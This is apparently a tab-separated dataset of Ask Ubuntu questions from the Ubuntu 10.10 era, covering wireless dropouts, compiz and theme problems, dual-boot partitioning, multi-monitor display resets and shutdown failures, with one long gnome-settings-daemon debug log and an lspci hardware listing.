11366	network manager kicks off abruptly	i have installed ubuntu 10.10 and trying to connect with my adsl wireless broadband internet modem using linksys wusb600n receiver . the good news is the os is able to detect my wifi network and i am able to hook to network over wpa authentication with basic settings . but the network goes off abruptly and never connects again until i reboot the machine . i have windows 7 as dual boot on my machine . the same adapter works perfectly with windows 7 but not in ubuntu . is there anything in need to tweak to make things working or do i need to try any other better network manager on ubuntu ?
11368	how to run xinit with no mouse ?	when i start my app using xinit in a new terminal ( ctrl+f1 ) my app needs the cursor to be on it , else the keyboard does n't answer . so , is there a way to start xinit specifing to do not use the mouse ?
11370	can mac os applications run natively ?	this may be a silly question , but since the newer mac systems are built on unix , is it possible to run a mac app natively on ubuntu ? i 'm specifically interested in the coda development environment .
11378	how do i set up an opengl programming environment ?	i want to setup opengl programming environment on ubuntu . what packages or tools i should install and what is the best way of getting into opengl as a newbie .
11381	applying my compiz settings to other user	where are all the compiz settings stored ? i would like to have another user have compiz configured the exact same way , what is the simplest way to do that ?
11384	is e4defrag ready for use ?	i want defragment my root ext4 partition after upgrade to 10.10 . but i ca n't find e4defrag in standart repos . may i build it from source ? and is it safe for use ? upd : now in 12.04 , we have e4defrag in repos . just tried it , and it works well ! i see some speed improvement . simply run e4defrag /dev/sda1
11387	how do i set gnome 's default open behavior for file types ?	i 'd like to set 10.10 to open mp3 files in muinshee when i open them from a file manager . i do n't really like totem very much , and opening all of banshee is a little bit too heavy for just playing a one-off audio file i grabbed from the web , or a song that one of my friends recorded and then sent to me over empathy .
11390	how do i start ntop with super-user privileges ?	i have installed ntop on my machine and i need to specify which network interface it should listen on . when i go to admin - > configure - > startup options in the web interface it says : you can not set the capture interface : missing privileges . you need to start ntop with super-user privileges [ -u ] how do i add the -u to the service startup ?
11392	what are the differences between mac os and linux ?	what are the major technical differences between apple 's os x and linux ? i understand mac and linux both have a similar architecture , so what are the major differences that prevent for example , mac applications being compatible with linux ?
11399	how to use compiz as the window manager for unity	when i tried to enable compiz , it said that i ca n't because of mutter . how may i enable compiz ?
11406	gnome-settings-daemon does n't apply themes , unless i kill it and start it manually	update : it looks like i 'm experiencing this bug where ubuntu ca n't do themes on fast computers ( e.g . ssd drive and/or i7 cpu ) . update : i just installed ubuntu 10.10 x64 on a second brand new computer . i logged in for the first time , and themes displayed ok , i then activated the recommended nvidia driver , rebooted , and the themes do n't display , same issue . if i kill `` gnome-settings- '' then run `` sudo gnome-settings-daemon '' the themes work again ( until i reboot ) . i just installed ubuntu 10.10 , and after activating the nvidia drivers , and ubuntu seems to have lost the theme , it looks like old school 9.04 or something ( but some parts , like the window title/menu bars look new ) jorge suggested in the comments that : `` this is n't a theme issue , you 're gnome-system-daemon is likely crashing . is this persistent across reboots ? '' looking back , i think the problems started when i tried to start using dual monitors . i ran the `` nvdia x server settings '' applet , and accidentally chose `` separate x screen ( requires x restart ) '' at which point i got different displays on each monitor , but each had their own panel and applications menu etc . i 've since switched to `` twinview '' which is the one i think i should have chosen originally . running gnome-settings-daemon produced the following output : alex @ alex-pc3 : ~ $ â alex @ alex-pc3 : ~ $ gnome-settings-daemon ** ( gnome-settings-daemon:11554 ) : warning ** : failed to acquire org.gnome.settingsdaemon ** ( gnome-settings-daemon:11554 ) : warning ** : could not acquire name if i run sudo gnome-setttings-daemon , then it seems to work , my panel and windows and icons etc all look modern as per the latest theme . however , after restarting the problem is back , so i guess i can manually run gnome-settings-daemon . i get this output from gnome-settings-daemon : alex @ alex-pc3 : ~ $ sudo gnome-settings-daemon alex @ alex-pc3 : ~ $ ** ( gnome-settings-daemon:1978 ) : warning ** : grab failed for some keys , another application may already have access the them . ** ( gnome-settings-daemon:1978 ) : warning ** : clipboard manager is already running . unable to find a synaptics device . i rebooted again , i typed `` ps - a | grep settings '' and found one process running called `` gnome-settings- '' , so it looks like gnome-settings-daemon is running , but not working ? debug output : alex @ alex-pc3 : ~ $ sudo killall gnome-settings-daemon alex @ alex-pc3 : ~ $ gnome-settings-daemon -- nodaemon -- debug ** ( gnome-settings-daemon:8325 ) : warning ** : unknown option -- nodaemon alex @ alex-pc3 : ~ $ gnome-settings-daemon -- no-daemon -- debug ** ( gnome-settings-daemon:8326 ) : debug : successfully connected to d-bus ** ( gnome-settings-daemon:8326 ) : debug : starting settings manager ** ( gnome-settings-daemon:8326 ) : debug : loading settings plugins from dir : /usr/lib/gnome-settings-daemon-2.0/ ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/media-keys.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='media keys ' file='/usr/lib/gnome-settings-daemon-2.0/media-keys.gnome-settings-plugin ' location='media-keys' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/mouse.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='mouse ' file='/usr/lib/gnome-settings-daemon-2.0/mouse.gnome-settings-plugin ' location='mouse' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/xrdb.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='x resource database ' file='/usr/lib/gnome-settings-daemon-2.0/xrdb.gnome-settings-plugin ' location='xrdb' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/keyboard.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='keyboard ' file='/usr/lib/gnome-settings-daemon-2.0/keyboard.gnome-settings-plugin ' location='keyboard' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/sound.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='sound ' file='/usr/lib/gnome-settings-daemon-2.0/sound.gnome-settings-plugin ' location='sound' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/typing-break.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='typing break ' file='/usr/lib/gnome-settings-daemon-2.0/typing-break.gnome-settings-plugin ' location='typing-break' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/housekeeping.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='housekeeping ' file='/usr/lib/gnome-settings-daemon-2.0/housekeeping.gnome-settings-plugin ' location='housekeeping' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/ubuntuone.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='ubuntu one ' file='/usr/lib/gnome-settings-daemon-2.0/ubuntuone.gnome-settings-plugin ' location='ubuntuone' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/clipboard.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='clipboard ' file='/usr/lib/gnome-settings-daemon-2.0/clipboard.gnome-settings-plugin ' location='clipboard' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/xrandr.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='xrandr ' file='/usr/lib/gnome-settings-daemon-2.0/xrandr.gnome-settings-plugin ' location='xrandr' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/font.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='font ' file='/usr/lib/gnome-settings-daemon-2.0/font.gnome-settings-plugin ' location='font' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/xsettings.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='x settings ' file='/usr/lib/gnome-settings-daemon-2.0/xsettings.gnome-settings-plugin ' location='xsettings' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/keybindings.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='keybindings ' file='/usr/lib/gnome-settings-daemon-2.0/keybindings.gnome-settings-plugin ' location='keybindings' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/background.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='background ' file='/usr/lib/gnome-settings-daemon-2.0/background.gnome-settings-plugin ' location='background' ** ( gnome-settings-daemon:8326 ) : debug : loading plugin : /usr/lib/gnome-settings-daemon-2.0/a11y-keyboard.gnome-settings-plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsplugininfo : name='accessibility keyboard ' file='/usr/lib/gnome-settings-daemon-2.0/a11y-keyboard.gnome-settings-plugin ' location='a11y-keyboard' ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c0cd40 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libxrandr.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdxrandrplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdxrandrplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdxrandrplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating xrandr plugin ** ( gnome-settings-daemon:8326 ) : debug : starting xrandr manager ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated xrandr ** ( gnome-settings-daemon:8326 ) : debug : plugin xrandr : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c0d000 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libxsettings.so ** ( gnome-settings-daemon:8326 ) : debug : registering gnomexsettingsplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gnomexsettingsplugin ** ( gnome-settings-daemon:8326 ) : debug : gnomexsettingsplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating xsettings plugin ** ( gnome-settings-daemon:8326 ) : debug : starting xsettings manager ** ( gnome-settings-daemon:8326 ) : debug : xft_settings_set_xresources : orig res 'xft.dpi : 96 xft.antialias : 1 xft.hinting : 1 xft.hintstyle : hintslight xft.rgba : rgb xft.lcdfilter : lcddefault ' ** ( gnome-settings-daemon:8326 ) : debug : xft_settings_set_xresources : new res 'xft.dpi : 96 xft.antialias : 1 xft.hinting : 1 xft.hintstyle : hintslight xft.rgba : rgb xft.lcdfilter : lcddefault ' ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated xsettings ** ( gnome-settings-daemon:8326 ) : debug : plugin xsettings : active ** ( gnome-settings-daemon:8326 ) : debug : plugin font : inactive ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c0d280 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libsound.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdsoundplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdsoundplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdsoundplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating sound plugin ** ( gnome-settings-daemon:8326 ) : debug : starting sound manager ** ( gnome-settings-daemon:8326 ) : debug : registering directory monitor for /home/alex/.local/share/sounds ** ( gnome-settings-daemon:8326 ) : debug : registering directory monitor for /usr/share/gnome ** ( gnome-settings-daemon:8326 ) : debug : registering directory monitor for /usr/local/share/ ** ( gnome-settings-daemon:8326 ) : debug : registering directory monitor for /usr/share/ ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated sound ** ( gnome-settings-daemon:8326 ) : debug : plugin sound : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c11f20 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libkeyboard.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdkeyboardplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdkeyboardplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdkeyboardplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating keyboard plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated keyboard ** ( gnome-settings-daemon:8326 ) : debug : plugin keyboard : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c11f70 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/liba11y-keyboard.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsda11ykeyboardplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsda11ykeyboardplugin ** ( gnome-settings-daemon:8326 ) : debug : gsda11ykeyboardplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating a11y_keyboard plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated a11y-keyboard ** ( gnome-settings-daemon:8326 ) : debug : plugin a11y-keyboard : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c57400 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libmouse.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdmouseplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdmouseplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdmouseplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating mouse plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated mouse ** ( gnome-settings-daemon:8326 ) : debug : plugin mouse : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c57450 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libkeybindings.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdkeybindingsplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdkeybindingsplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdkeybindingsplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating keybindings plugin ** ( gnome-settings-daemon:8326 ) : debug : starting keybindings manager ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated keybindings ** ( gnome-settings-daemon:8326 ) : debug : plugin keybindings : active ** ( gnome-settings-daemon:8326 ) : debug : plugin xrdb : inactive ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c574a0 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libbackground.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdbackgroundplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdbackgroundplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdbackgroundplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating background plugin ** ( gnome-settings-daemon:8326 ) : debug : starting background manager ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated background ** ( gnome-settings-daemon:8326 ) : debug : plugin background : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c574f0 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libmedia-keys.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdmediakeysplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdmediakeysplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdmediakeysplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating media_keys plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated media-keys ** ( gnome-settings-daemon:8326 ) : debug : plugin media-keys : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c69400 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libclipboard.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdclipboardplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdclipboardplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdclipboardplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating clipboard plugin ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated clipboard ** ( gnome-settings-daemon:8326 ) : debug : plugin clipboard : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c69450 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libtyping-break.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdtypingbreakplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdtypingbreakplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdtypingbreakplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating typing_break plugin ** ( gnome-settings-daemon:8326 ) : debug : starting typing_break manager ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated typing-break ** ( gnome-settings-daemon:8326 ) : debug : plugin typing-break : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c694a0 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libubuntuone.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdubuntuone ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdubuntuone ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated ubuntuone ** ( gnome-settings-daemon:8326 ) : debug : plugin ubuntuone : active ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmodule 0x1c694f0 initialising ** ( gnome-settings-daemon:8326 ) : debug : loading /usr/lib/gnome-settings-daemon-2.0/libhousekeeping.so ** ( gnome-settings-daemon:8326 ) : debug : registering gsdhousekeepingplugin ** ( gnome-settings-daemon:8326 ) : debug : creating object of type gsdhousekeepingplugin ** ( gnome-settings-daemon:8326 ) : debug : gsdhousekeepingplugin initializing ** ( gnome-settings-daemon:8326 ) : debug : activating housekeeping plugin ** ( gnome-settings-daemon:8326 ) : debug : starting housekeeping manager ** ( gnome-settings-daemon:8326 ) : debug : housekeeping : will tidy up in 2 minutes ** ( gnome-settings-daemon:8326 ) : debug : gnomesettingsmanager : emitting plugin-activated housekeeping ** ( gnome-settings-daemon:8326 ) : debug : plugin housekeeping : active ** ( gnome-settings-daemon:8326 ) : debug : starting keyboard manager [ 1289226919,000 , xklavier.c : xkl_engine_start_listen/ ] the backend does not require manual layout management - but it is provided by the application ** ( gnome-settings-daemon:8326 ) : debug : starting a11y_keyboard manager ** ( gnome-settings-daemon:8326 ) : debug : starting media_keys manager ** ( gnome-settings-daemon:8326 ) : debug : not a valid shortcut : '' ** ( gnome-settings-daemon:8326 ) : debug : adding key filter for screen : 0 ** ( gnome-settings-daemon:8326 ) : warning ** : clipboard manager is already running . ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=0 name='consolekit session /org/freedesktop/consolekit/session2' ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=2 name='networkmanager applet' ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=3 name='ayatana.indicator.sound' ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=4 name='file manager' ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=5 name='gtk-window-decorator' ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=10 name='xsmp session on gnome-session as 10265a88872e6e751d128896818869836100000014480036' ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=11 name='panel' ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=25 name='alsa plug-in [ tweetdeck ] ' ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=29 name='rhythmbox' ** ( gnome-settings-daemon:8326 ) : debug : updating client : index=30 name='gnome volume control media keys' ** ( gnome-settings-daemon:8326 ) : debug : updating sink : index=0 name='alsa_output.pci-0000_00_1b.0.analog-stereo ' description='internal audio analog stereo ' map='front-left , front-right' ** ( gnome-settings-daemon:8326 ) : debug : updating source : index=0 name='alsa_output.pci-0000_00_1b.0.analog-stereo.monitor ' description='monitor of internal audio analog stereo' ** ( gnome-settings-daemon:8326 ) : debug : updating source : index=1 name='alsa_input.pci-0000_00_1b.0.analog-stereo ' description='internal audio analog stereo' ** ( gnome-settings-daemon:8326 ) : debug : udpating card alsa_card.pci-0000_00_1b.0 ( index : 0 driver : module-alsa-card.c ) : ** ( gnome-settings-daemon:8326 ) : debug : profile 'output : analog-stereo ' : 0 sources 1 sinks ** ( gnome-settings-daemon:8326 ) : debug : profile 'output : analog-stereo+input : analog-stereo ' : 1 sources 1 sinks ( current ) ** ( gnome-settings-daemon:8326 ) : debug : profile 'output : analog-stereo+input : iec958-stereo ' : 1 sources 1 sinks ** ( gnome-settings-daemon:8326 ) : debug : profile 'output : iec958-stereo ' : 0 sources 1 sinks ** ( gnome-settings-daemon:8326 ) : debug : profile 'output : iec958-stereo+input : analog-stereo ' : 1 sources 1 sinks ** ( gnome-settings-daemon:8326 ) : debug : profile 'output : iec958-stereo+input : iec958-stereo ' : 1 sources 1 sinks ** ( gnome-settings-daemon:8326 ) : debug : profile 'input : analog-stereo ' : 1 sources 0 sinks ** ( gnome-settings-daemon:8326 ) : debug : profile 'input : iec958-stereo ' : 1 sources 0 sinks ** ( gnome-settings-daemon:8326 ) : debug : profile 'off ' : 0 sources 0 sinks ** ( gnome-settings-daemon:8326 ) : debug : property : 'alsa.card ' = '0' ** ( gnome-settings-daemon:8326 ) : debug : property : 'alsa.card_name ' = 'hda intel' ** ( gnome-settings-daemon:8326 ) : debug : property : 'alsa.long_card_name ' = 'hda intel at 0xfbff8000 irq 52' ** ( gnome-settings-daemon:8326 ) : debug : property : 'alsa.driver_name ' = 'snd_hda_intel' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.bus_path ' = 'pci-0000:00:1b.0' ** ( gnome-settings-daemon:8326 ) : debug : property : 'sysfs.path ' = '/devices/pci0000:00/0000:00:1b.0/sound/card0' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.bus ' = 'pci' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.vendor.id ' = '8086' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.vendor.name ' = 'intel corporation' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.product.id ' = '3b56' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.product.name ' = '5 series/3400 series chipset high definition audio' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.form_factor ' = 'internal' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.string ' = '0' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.description ' = 'internal audio' ** ( gnome-settings-daemon:8326 ) : debug : property : 'module-udev-detect.discovered ' = '1' ** ( gnome-settings-daemon:8326 ) : debug : property : 'device.icon_name ' = 'audio-card-pci' unable to find a synaptics device . ** ( gnome-settings-daemon:8326 ) : debug : performing delayed syncdaemon init ** ( gnome-settings-daemon:8326 ) : debug : syncdaemon not running , waiting for it to start in nameownerchanged
11411	partition doubt before installing ubuntu 10.10	i am trying to install ubuntu 10.10 on a machine running windows 7 ultimate currently . i have few doubts , before i moved forward with installation regarding partitioning ( i have lot vista last time without any back up : ( ) . so i am following the tutorial here my current machine config is : windows 7 ultimate 300 gb ( 262 gb ntfs windows + 100 mb ( system files ) + 37 gb unallocated ( used windows shrink tool ) ) i have ubuntu 10.10 on usb ( with usb plug in ( which boots it perfectly ) ) my doubts are : the author has mentioned about making multiple partitions under ubuntu and windows- windows 7 system partition ( i am guessing its my 262 gb ) ( sda1 ) extended partition - ( sda2 ) windows partition ( windows files ) - ( sda5 ) windows data partition ( user files ) ; '' you can share it in linux '' . i definitely want this , if i can at least open my media ( pics , videos n all from both os ) linux root , linux swap , linux home 1.do i really need all this ? 2.if i do need these 3 linux partitions , considering 37gb for linux , how would you suggested me distribute it ? your help is highly appreciated .
11415	which startup applications can i safely turn off ?	i see : bluetooth manager certificate and key storage check for new hardware drivers disk notifications gnome login sound gsettings data conversion network manager nvdia x server settings power manager print queue applet pulseaudio sound system pulseaudio sound system kde routing policy remote desktop secret storage service ssh key agent ubuntu one update notifier user folders update visual assistance i 'd like to turn off these : bluetooth manager disk notifications gnome login sound gsettings data conversion power manager remote desktop ubuntu one user folders update visual assistance
11417	can i save my desktop layout as a file ?	i 'm interested in playing with awn and docky , but have spent quite a bit of time getting my current layout ( using native gnome panels ) in a usable state . is there any way to save the layout ( i.e . which panels i have , what launchers - including custom - are on them , etc . ) to a file so that if i end up not liking either awn or docky i can restore my original native settings without redoing it all manually ? i 'm running maverick .
11421	after startup , display reverts to one desktop duplicated on both screens	i have a samsung r530 laptop . i 'm actually running linux mint , which is based on ubuntu ( which is why i thought it would be ok to post this here ) . i 'm now getting exactly the same problem on ubuntu 10.10 . i 've got it setup with a secondary lcd monitor , and i 've changed the display settings so the laptop screen and monitor are at optimal resolution , with the desktop shared between them . after startup though ( typically around 10-30 seconds ) the display reverts to 1024 x 768 on both screens , and the display is duplicated ( i.e . both screens show the same thing ) . i think this is something to do with my video card , as i had the same problem when i was running arch linux . any ideas ? edit : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 09 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation ich9m/m-e sata ahci controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 04:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller it seems it 's intel , not nvidia . i have a current work around , which is to have a launcher to a script containing xrandr -- output lvds1 -- mode 1366x768 -- output hdmi1 -- mode 1280x1024 -- left-of lvds1 on my desktop , and to run it after the displays revert , but it 's not ideal .
11423	does it make sense to store a git repo on ubuntu one ?	i 'm working on a small project , mostly at home , but i 'd like to be able to access my git repo from multiple machines , all of which are connected to ubuntu one . do you think i can safely store my repo in u1 and work from there , or will that get me into trouble ?
11432	why is n't metasploit in ubuntu 's software repositories ?	why is n't metasploit in ubuntu 's software repositories ? more broadly , on what basis is software chosen or not to be added to the official ubuntu repositories ? who takes those decisions ? etc .
11436	notification of new devices on wireless network ?	just wondering if there is an application that can notify me of a new device on my wireless network ( ie : home computer online , mobile phone online , home computer offline , etc ) so i can easily take care of the family network and jump on problems before they appear . is this possible with ubuntu/wireless networks ?
11437	hp tc4200 tablet stylus not working on unity interface	i 've installed 10.10 netbook edition on my hp tc4200 tablet pc . i primarily use it in the slate mode with a stylus and on screen keyboard . i can use the stylus as a mouse replacement for everything except for selecting the icons on the unity-panel and i have to use the touchpad to select and activate the icons to launch a program from the unity-panel . what could be the problem and if you can suggest a fix would be really appreciable . this is my first time using ubuntu ( or linux for that matter ) , therefore , i am not conversant with the terminal commands . kind regards , ram
11438	shutdown fails after upgrading from lucid to maverick ?	it did n't happen in my computer , but in my girlfriend 's pc . she upgraded to maverick and now it does n't shutdown properly , the screen just freezes and she has to shutdown pressing and holding the power button . i 've tried adding : apm power_off=1 to /etc/modules and acpi=force to etc/default/grub config , but it still does n't work ... by the way , the computer is new , it 's just like 3 weeks old so the hardware should not be that outdated .
